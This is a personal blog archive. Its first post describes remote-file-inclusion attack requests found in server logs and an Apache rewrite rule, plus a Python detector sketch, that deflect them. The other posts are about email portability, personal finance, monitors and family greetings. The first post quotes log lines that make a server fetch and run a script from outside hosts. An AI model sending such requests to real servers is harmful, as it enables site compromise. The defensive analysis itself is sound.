Archive for category News

How to frustrate a trojan bot script

While doing some regular maintenance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IPs:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? 

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc.

Then it hit me. Why are we spending all this precious CPU time for these attackers? Why not have them waste their own CPU time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request back to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and being given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a loopback address, a network standard which always points to yourself.

Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:

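RewriteEngine on
# Match the literal string 'cs.txt?' in the query string. '.' and '?' are
# regex metacharacters, so they are escaped; unescaped, the pattern also
# matches unrelated strings. [NC] makes the match case-insensitive.
RewriteCond %{QUERY_STRING} cs\.txt\? [NC]
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]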

So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.

While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead. 
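As an added example (not part of the original post), the Python sketch below scans request lines for the general shape of these hits: a query parameter whose value is itself a remote URL, whatever the file is called. It also compares the unescaped pattern `cs.txt?` with the escaped `cs\.txt\?` on a harmless request. The sample lines other than the two quoted above, the scheme list and all function names are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request lines; the first two are the ones quoted in the post.
SAMPLE_REQUESTS = [
    "GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?",
    "GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?",
    "GET /modules.php?op=modload&name=News&file=article",
    "GET /download.php?file=specs-txt",
    "GET /index.php?page=HTTPS://files.example.net/inc.txt",
    "GET /search.php?q=how+to+link+http://example.org",
]

# A parameter value that is itself a remote URL (assumed scheme list).
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# The filename pattern, unescaped and with '.' and '?' escaped.
UNESCAPED = re.compile(r"cs.txt?", re.IGNORECASE)
ESCAPED = re.compile(r"cs\.txt\?", re.IGNORECASE)

def query_of(request_line):
    """Return the raw query string of a 'METHOD target' line ('' if none)."""
    target = request_line.split(" ", 2)[1]
    return target.partition("?")[2]

def remote_include_params(request_line):
    """Return (parameter, remote host) pairs whose value starts with a URL."""
    hits = []
    for name, value in parse_qsl(query_of(request_line), keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            hits.append((name, urlsplit(value).hostname))
    return hits

def summarize(requests):
    """Count flagged requests per remote host named in the parameter."""
    counts = Counter()
    for line in requests:
        for _, host in remote_include_params(line):
            counts[host] += 1
    return counts

if __name__ == "__main__":
    for host, n in summarize(SAMPLE_REQUESTS).most_common():
        print(f"{n:3d}  {host}")
    harmless = query_of(SAMPLE_REQUESTS[3])
    print(bool(UNESCAPED.search(harmless)), bool(ESCAPED.search(harmless)))
```

The search request that merely mentions a URL inside its text is not flagged, because only values that begin with a scheme are counted.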

No Comments

E-Mail Address Portability?

This week, someone decided to petition the FCC for something amazingly stupid: they want the FCC to force ISPs to provide 'e-mail address portability'. Just like with telephone numbers, this individual thinks it's a good idea.

This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actually entities, bought and owned by someone or a company. The key word is owned. You don't 'own' the email address, in essence, you're 'renting' it! You stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.

Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email to address #1 with a 10Mb attachment. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, until it gets to address #5. My email has been handled by 5 different ISPs, and they all had to absorb the cost of moving my bytes over to another ISP, and so on. Absolutely ridiculous if you ask me.

I'm all for asking ISPs to do something like this for a very short period of time, just like the Postal Service. But, I would do it somewhat differently. Instead of burdening the ISPs with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved' and here is his/her new email address. We're now talking about an email with a size of 1000 to 2000 bytes, instead of in the megabytes. We avoid forwarding spam, and if the sender email doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISPs that already do this as a courtesy to their customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.

So instead of petitioning for e-mail address portability, we should be asking ISPs to implement some sort of email 'address' forwarding/bounce functionality instead. It's cleaner, more efficient and much less of a burden on ISPs and the infrastructure as a whole.

 

No Comments

Dilbert’s 9-Point Financial Plan

Before I go any further, yes, it's been a while since I last posted here on my site. There's been a lot going on in my personal life in the past year and let's face it; I'm not going to post stuff just for the sake of posting. That being said, I'm going to try and make a concerted effort to be more active here. Yes, I've said it before, so who knows what will happen…

Now, I came across what I initially thought was a joke while reading through some feeds I routinely keep up with. It turns out that in Scott Adams's book "Dilbert and the Way of the Weasels", there's a simple 9-point plan that puts in very simple words how to manage your financial freedom. Paul Farrell of Marketwatch had this to say about the small blurb:

Adams boldly states that this is "everything you need to know about personal investing." In just 129 words, nine simple points, one page you have the unabridged "Unified Theory of Everything Financial." That's it. Everything!

Here are the 9 points:

  1. Make a will
  2. Pay off your credit cards
  3. Get term life insurance if you have a family to support
  4. Fund your 401k to the maximum
  5. Fund your IRA to the maximum
  6. Buy a house if you want to live in a house and can afford it
  7. Put six months worth of expenses in a money-market account
  8. Take whatever money is left over and invest 70% in a stock index fund and 30% in a bond fund through any discount broker and never touch it until retirement
  9. If any of this confuses you, or you have something special going on (retirement, college planning, tax issues), hire a fee-based financial planner, not one who charges a percentage of your portfolio

There you have it. That's all you need to do! You can read the Marketwatch article at http://www.marketwatch.com/News/Story…

No Comments

Dual-LCD Monitors

[Image: DELL UltraSharp 2005FPW 20.1-inch Wide Aspect Flat Panel LCD Monitor]

I've been using an LCD monitor at home for about 4-5 years now, ever since my old CRT monitor started acting up and began being sensitive to anything electrical being turned on in the house. Recently, my wife and I decided to transform our seldom-used dining room into a full office; lots of Ikea office furniture and accessories later, I was able to double my deskspace as well as have a place to be a geek on the same floor where we spend most of our time as a family. Of course, all that extra deskspace was the perfect opportunity to purchase a new LCD monitor. A great sale and some online coupons later, I was the new owner of a fantastic DELL UltraSharp 2005FPW 20.1-inch Wide Aspect Flat Panel LCD Monitor.

This morning, as I was sitting in front of my computer, it hit me; I have a perfectly good 18.1" LCD monitor just sitting upstairs in my old office gathering dust! I cleared a little bit of space to the right of my Dell LCD and brought the critter down.

I use a dual-monitor setup every day at work, using my laptop screen and a large external CRT monitor. It's a great productivity booster for me, since I can have my Instant Messenger and email clients on my extra screen, while my main desktop holds the applications I currently need to complete whatever job is at hand. A dual-monitor setup is simply incredible if you have the opportunity to set one up for yourself. The use of LCDs is even better, since the power consumption of the two monitors combined is still under what my old CRT beast used to suck out of the power-outlet. Not to mention the negligible heat produced…

UPDATE: My new monitor setup meant that a change to my online status page also had to be made. Also, since I was moving the monitor down, I decided to finally move the old webcam down also, so the home-office webcam is also back up and online. Enjoy!

No Comments

Happy New Year to my Family and Friends!

I wanted to take a minute to wish everyone a very Happy New Year! May the new year bring you happiness, peace, prosperity, love and lots of cool geek toys!

No Comments

The Sweet Smell of Battlefield 2

[Image: Eric Bazerghi and his copy of Battlefield 2]

Amy and I decided to head out to Sam’s Club this morning to pick up a few things for the weekend, including some light bulbs and various other sundries. As is always the case, we walk through the DVD and PC software aisles to see if there’s anything that catches our eye and to get some new software for Sara to play with during ‘computer time’. Lo and behold, right next to some cool Blue’s Clues game we decide to get for Sara, there’s a stack of Battlefield 2 game boxes. Amy looks at me and tells me how some kid has been posting a bunch of stuff on our community forums about how good this game was, etc. I tell her that I’ve been enjoying the demo and that I’ll probably buy it later in the month, and we continue our morning of shopping in ‘bulk’.

While unloading the cart to pay, right there under the Blue’s Clues game is a Battlefield 2 box. I look up at Amy and all she says is “You’re welcome.”, smiles, and continues to unload the cart. Dammit, I love that woman! So, THANKS AMY! Here’s to another few weeks of going to bed late while playing a computer game until the wee hours of the night… Oh, and we forgot to buy the lightbulbs…

No Comments

Happy Birthday Papa!

Just wanted to take a minute to wish my dad a wonderful birthday. While he and mom might be 1052 miles away from us, he is always in my heart. Thanks Dad, for being the perfect example of how I in turn should be a father to my daughter. Bonne Fête Papa!

No Comments

Happy Canada Day!

[Image: Canadian Flag]

Happy Canada Day to all my fellow Canadians! I may be calling the US my home, but having been born and raised in Canada, I still take pride in its culture, its people and the land that made me who I am today. Bonne Fête, Canada!

No Comments

Many Thought it would Never Happen

Pigs flew and Hell Froze Over. The Fat Lady not only sang, she leapt out of her office chair, partied till dawn, and lost her voice screeching like a madwoman somewhere on the Internet while surfing the night away.
After close to a year, I finally updated my site and am hopefully beginning a new ‘era’ of more frequent postings. Sure, many of you have laughed at me in the past, mocking my every mention of my work on the site. Well, I’m on a roll now; just a few weeks ago, I finally cleared out our garage after a couple of years of it being a huge mess of a storage area. The garage was something I wanted to get done for a long time, and now, I’m ready to apply that same level of dedication to this website.
Laugh if you wish; hopefully, I will have the last laugh.

No Comments

Issues with my current website ‘theme’…

I run the latest and greatest CVS version of Drupal under the hood of this site. Looks like the latest changes to the core changed the way a couple of functions I use in my new theme work. Until I can get the code rewritten, this is how the site will look. Not great, but usable I guess…

No Comments

Yes, I finally updated my site…

I finally got tired of getting ridiculed by Scott and Matt and took the time to get a few things straightened out in order to get the new site out.

I’ve moved away from using Postnuke, which was becoming more of a burden each time I wanted to do something with the site. It was also heavy and full of bugs that drove me nuts. I’m now using Drupal as the core CMS for the site. It’s MUCH easier to play with the code, the look and feel, etc. Also, I have been dealing with a couple of members of the development team and find this Open Source package a refreshing change from other cores I looked at.

I still have work to do, but what you see here is probably 75% of what the site will actually end up looking like. Let me know if you have any ideas and/or issues.

Thanks.

No Comments